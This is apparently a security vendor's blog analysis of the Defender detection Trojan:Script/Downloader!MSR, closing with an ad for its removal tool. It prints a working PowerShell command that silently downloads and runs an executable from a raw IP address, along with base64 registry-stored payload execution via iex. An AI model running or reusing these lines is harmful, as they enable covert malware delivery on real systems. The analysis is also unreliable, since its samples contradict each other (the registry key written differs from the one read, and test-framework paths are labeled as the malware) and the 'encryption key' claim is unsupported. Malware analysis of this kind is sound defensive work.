Trojan:Script/Downloader!MSR is a malicious script that downloads other malware onto the target system. It is most commonly spread through illegal software and fake documents, and is capable of deploying pretty much any malicious program. Due to the complexity and the use of obfuscation, the exact malicious script may remain undetected, while the Defender will display a powershell.exe file as affected.
Trojan:Script/Downloader!MSR Overview
Trojan:Script/Downloader!MSR is a heuristic detection of Microsoft Defender that flags a small malware downloading script. Unlike a full-fledged dropper, this malicious thing is in fact disposable: it never runs again after execution. This loader executes a selection of commands in PowerShell or Command Prompt, which triggers Microsoft Defender. But since this detection is heuristic, and malicious activity comes from the activity within the PS environment, the built-in antivirus says that the powershell.exe is in question.
Trojan:Script/Downloader!MSR is typically spread through common malware methods such as game mods, pirated games, software, activators (KMS), and keygens. It is also distributed under the guise of legitimate files, masked with double extension and an altered file icon. As for the payload, Trojan:Script/Downloader!MSR most often delivers spyware, remote administrative tools, and ransomware.
Technical Analysis
Let’s get into Trojan:Script/Downloader!MSR operations on the target system by analysing the scripts this malware may use. By its nature, it does not perform any checks for the presence of a sandbox. Instead, it immediately executes its function—dropping the payload:
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue' -ScriptBlock { (New-Object System.Net.WebClient).DownloadFile('http://5.252.161.59:8880/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe' }
As we can see, the malicious script uses PowerShell to download and execute a malicious file. It employs the ExecutionPolicy Bypass parameter to run the script without security restrictions. -NoExit makes the console window persistent, i.e. it does not close once the command execution is over, so the script can execute other commands. It also uses -WindowStyle Hidden to hide the PowerShell window, so the user does not notice its execution. Next, the Start-Process command ‘C:\\test-MDATP-test\\invoice.exe’} executes the downloaded file.
Basic Code Obfuscation
Although this is a fairly primitive loader script, some obfuscation may be used to make the detection harder. Below, you can see one of the intermediary commands that the script can execute to add a specific registry key. This key may further be a foothold for the malware the script will deploy, for gaining persistence or storing valuable data.
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AppProgram" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
This way, the malware adds a new registry key and sets its value to a base64-encoded string. The base64-encoded shell code looks like this:
powershell.exe -e #{JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==}
Even though the malware has an encryption key, the obfuscation makes it harder to detect.
Is Trojan:Script/Downloader!MSR a False Positive?
Sometimes, Trojan:Script/Downloader!MSR can be detected by antivirus software as a false positive. This mostly occurs when a program lacks a valid certificate and accesses the internet. In some cases, detection happens when the program contacts suspicious IP addresses. Regardless, it is always essential to check such detections to rule out any real threats.
For these purposes, I recommend using GridinSoft Anti-Malware. In addition to scanning and cleaning your system, it provides proactive device protection and Internet Security, which will prevent threats even at the download stage.
Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.
After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.
Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.